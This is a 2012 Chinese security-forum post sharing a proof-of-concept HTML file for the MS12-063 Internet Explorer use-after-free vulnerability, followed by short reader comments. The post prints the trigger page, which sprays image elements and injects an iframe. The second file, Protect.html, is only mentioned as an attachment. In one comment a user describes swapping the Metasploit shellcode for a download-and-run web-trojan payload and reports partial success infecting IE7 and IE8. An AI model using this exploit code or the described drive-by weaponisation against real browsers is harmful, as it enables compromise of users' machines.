最新MS12-063 POC

2012-09-25 17:39:40 36 t00ls管理团队02 5512

最新的MS12-063 IE 漏洞的poc样本，由内存释放引发的use after free漏洞，有兴趣的可以研究。

poc.htm

<html>

        <body>



                <SCRIPT>

                        var times = 0;

                        var jifud = new Array();

                        while(times < 100) {

                                jifud[times] = window.document.createElement("img");

                                jifud[times]["src"] = "a";

                                times++;

                        }

                </SCRIPT>

        xxxx

        <script>document.body.innerHTML="x<iframe src=Protect.html width=10 height=1></iframe>";</script>

        </body>

</html>

Protect.html见附件。

类别逆向破解

关于作者

t00ls管理团队0219篇文章47篇回复

t00ls管理团队02

评论36次

要评论？请先登录或注册

16楼

xiaoxiaoabc
2012-12-20 17:34

我再来看一遍！我下了2遍，。第一次我丢了！！！

回复|@ta|踩(0)|顶(0)
15楼

245661320
2012-12-18 22:18

我来看看

回复|@ta|踩(0)|顶(0)
14楼

xlk111
2012-10-26 22:38

swf哪里去了

回复|@ta|踩(0)|顶(0)
13楼

xiaoxiaoabc
2012-10-26 18:36

不错

回复|@ta|踩(0)|顶(0)
12楼

染血の雪
2012-10-9 10:12

先标记一下

回复|@ta|踩(0)|顶(0)
11楼

teardrop
2012-10-6 23:13

这个漏洞是这几个月最强大漏洞了直接影响IE6-9版本

回复|@ta|踩(0)|顶(0)
10楼

imspider
2012-9-26 22:54

我在metasploit里取的样本，改了下shellcode（网马下载运行），IE7，IE8都测试过，偶尔会中马（刷新10次，大概3次会中，而且有些延时），不知道为什么。

回复|@ta|踩(0)|顶(0)
9楼

sunshine
2012-9-26 16:24

灰常想看啊。。

回复|@ta|踩(0)|顶(0)
8楼

atta
2012-9-26 13:44

缺SWF文件

回复|@ta|踩(0)|顶(0)
7楼

liuda
2012-9-25 23:45

先下载

回复|@ta|踩(0)|顶(0)
6楼

Cr4zy
2012-9-25 22:13

..太高端弄不懂

回复|@ta|踩(0)|顶(0)
5楼

uncia
2012-9-25 21:29

目测，牛奔，但。。

回复|@ta|踩(0)|顶(0)
4楼

xiehou
2012-9-25 21:20

这是什么漏洞呢？表示最近有点忙没不关注这类的新闻````

回复|@ta|踩(0)|顶(0)
3楼

wepeng
2012-9-25 21:19

支持、、、

回复|@ta|踩(0)|顶(0)
2楼

ty4z2008
2012-9-25 18:51

求管理原创

回复|@ta|踩(0)|顶(0)
1楼

xiaoxiaoabc
2012-9-25 18:34

先下载看看去。

回复|@ta|踩(0)|顶(0)